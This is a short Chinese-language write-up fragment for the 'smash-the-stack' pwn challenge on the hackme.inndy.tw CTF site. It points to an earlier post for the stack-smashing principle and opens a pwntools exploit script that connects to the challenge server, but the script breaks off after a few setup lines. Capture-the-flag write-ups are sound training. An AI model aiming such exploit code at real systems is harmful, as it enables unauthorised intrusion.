hackme pwn smash-the-stack [stack smash]

根据提示:stderr!和32C3的readme同样,原理看上篇,这里贴两个exppython #! /usr/bin/env python # coding=utf-8 from pwn import * #io = process('./smash-the-stack') io = remote('hackme.inndy.tw', 7717) argv_addr = 0xffffcfa4
相关文章
相关标签/搜索